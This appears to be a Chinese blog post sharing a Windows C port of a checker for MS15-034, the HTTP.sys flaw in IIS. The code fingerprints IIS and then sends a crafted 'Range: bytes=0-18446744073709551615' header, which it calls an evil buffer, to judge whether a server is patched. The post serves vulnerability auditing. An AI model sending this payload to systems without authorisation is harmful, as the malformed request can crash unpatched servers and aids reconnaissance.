HTTP.sys 远程执行代码验证工具

Posted 2020-08-20 persuit

漏洞信息：

　　远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。这里将测试工具改成windows版本方便工作。

代码：

 

/*
 UNTESTED - MS15-034 Checker
  
 THE BUG:

    8a8b2112 56              push    esi
    8a8b2113 6a00            push    0
    8a8b2115 2bc7            sub     eax,edi
    8a8b2117 6a01            push    1
    8a8b2119 1bca            sbb     ecx,edx
    8a8b211b 51              push    ecx
    8a8b211c 50              push    eax
    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
*/

#define WIN32_LEAN_AND_MEAN 
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <winsock2.h> 
#include <Ws2tcpip.h>

#pragma  comment(lib,"ws2_32.lib")

int connect_to_server(char *ip,const int port)
{
    int sockfd = 0, n = 0;
    //SOCKET sockSrv;

    struct sockaddr_in serv_addr;
//初始化版本
    WORD version(0);
    WSADATA wsadata;
    int socket_return(0);
    version = MAKEWORD(2,0);
    socket_return = WSAStartup(version,&wsadata);
    
    if (socket_return != 0)
    {
        return 0;
    }
    
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("\\n Error : Could not create socket %d\\n",GetLastError());
        return 1;
    }

    memset(&serv_addr, \'0\', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    //serv_addr.sin_port = htons(80);
    serv_addr.sin_port = htons(port);

    if (inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
    {
        printf("\\n inet_pton error occured\\n");
        return 1;
    }
    if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
           printf("\\n Error : Connect Failed \\n");
        exit(-1);
          return 1;
    } 

    return sockfd;
}
    
int main(int argc, char *argv[])
{
    int n = 0;
    int sockfd;
    char recvBuff[1024];

    // Check server
    char request[] = "GET / HTTP/1.0\\r\\n\\r\\n";
    // our evil buffer
    char request1[] = "GET / HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-18446744073709551615\\r\\n\\r\\n";

    if (argc != 3)
    {
        printf("\\n Usage: %s <ip of server> <port of server> \\n",argv[0]);
        return 1;
    } 

    printf("[*] Audit Started\\n");

    sockfd = connect_to_server(argv[1],atoi(argv[2]));
    send(sockfd, request, strlen(request),0); 
    recv(sockfd, recvBuff, sizeof(recvBuff)-1,0);

    if (!strstr(recvBuff,"Microsoft"))
    {
        printf("[*] NOT IIS\\n");
        exit(1);
    }

    sockfd = connect_to_server(argv[1],atoi(argv[2]));
    send(sockfd, request1, strlen(request1),0);
    recv(sockfd, recvBuff, sizeof(recvBuff)-1,0);

    if (strstr(recvBuff,"Requested Range Not Satisfiable"))
    {
        printf("[!!] Looks VULN\\n");
        exit(1);
    } 
    else if (strstr(recvBuff,"The request has an invalid header name"))
    {
        printf("[*] Looks Patched");
    } 
    else
    {
        printf("[*] Unexpected response, cannot discern patch status");
    }

    return 0;
}

 

测试截图：